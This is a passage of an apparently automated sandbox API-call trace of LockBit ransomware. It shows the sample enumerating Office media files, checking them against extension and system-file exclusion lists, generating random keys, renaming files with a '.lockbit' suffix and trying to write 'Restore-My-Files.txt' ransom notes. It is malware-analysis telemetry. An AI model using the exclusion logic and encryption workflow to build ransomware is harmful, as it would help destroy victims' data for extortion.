[0201.156] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.156] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.156] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF.lockbit") returned 79 [0201.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18233_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0201.170] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.170] malloc (_Size=0x40068) returned 0x3d70450 [0201.171] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1612) returned 1 [0201.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0201.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0201.172] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0201.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.176] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.176] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.178] free (_Block=0x1fa2ed8) [0201.178] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.178] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.178] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.178] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eba9f00, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc71fe0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6eba9f00, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x754, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18234_.WMF", cAlternateFileName="")) returned 1 [0201.178] lstrcmpiW (lpString1=".", lpString2="BD18234_.WMF") returned -1 [0201.178] lstrcmpiW (lpString1="..", lpString2="BD18234_.WMF") returned -1 [0201.178] PathFindExtensionW (pszPath="BD18234_.WMF") returned=".WMF" [0201.178] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.179] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.180] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.180] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18234_.WMF") returned 1 [0201.180] lstrcmpiW (lpString1="ntldr", lpString2="BD18234_.WMF") returned 1 [0201.180] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18234_.WMF") returned 1 [0201.181] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18234_.WMF") returned 1 [0201.181] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18234_.WMF") returned -1 [0201.181] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18234_.WMF") returned 1 [0201.181] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18234_.WMF") returned 1 [0201.181] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.181] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF") returned=".WMF" [0201.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.181] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.181] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.182] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.182] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF.lockbit") returned 79 [0201.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18234_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0201.183] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.183] malloc (_Size=0x40068) returned 0x3df0008 [0201.183] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1876) returned 1 [0201.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.185] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.215] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.215] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.215] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.217] free (_Block=0x1fa2ed8) [0201.217] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.217] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.217] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.217] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a25aa00, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc71fe0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8a25aa00, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18235_.WMF", cAlternateFileName="")) returned 1 [0201.217] lstrcmpiW (lpString1=".", lpString2="BD18235_.WMF") returned -1 [0201.217] lstrcmpiW (lpString1="..", lpString2="BD18235_.WMF") returned -1 [0201.217] PathFindExtensionW (pszPath="BD18235_.WMF") returned=".WMF" [0201.217] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.217] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.217] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.217] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.217] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.217] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.218] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.218] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18235_.WMF") returned 1 [0201.219] lstrcmpiW (lpString1="ntldr", lpString2="BD18235_.WMF") returned 1 [0201.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18235_.WMF") returned 1 [0201.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18235_.WMF") returned 1 [0201.219] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18235_.WMF") returned -1 [0201.220] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18235_.WMF") returned 1 [0201.220] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18235_.WMF") returned 1 [0201.220] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.220] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF") returned=".WMF" [0201.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.220] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.220] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.221] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.221] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF.lockbit") returned 79 [0201.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18235_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0201.226] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.226] malloc (_Size=0x40068) returned 0x1ff1e60 [0201.226] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1852) returned 1 [0201.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0201.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0201.227] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.231] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.231] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.231] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.233] free (_Block=0x1fa2ed8) [0201.233] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.233] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.233] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.233] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f9ad400, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc71fe0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9f9ad400, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x6d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18236_.WMF", cAlternateFileName="")) returned 1 [0201.233] lstrcmpiW (lpString1=".", lpString2="BD18236_.WMF") returned -1 [0201.233] lstrcmpiW (lpString1="..", lpString2="BD18236_.WMF") returned -1 [0201.234] PathFindExtensionW (pszPath="BD18236_.WMF") returned=".WMF" [0201.234] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.234] lstrcmpiW (lpString1=".msp", 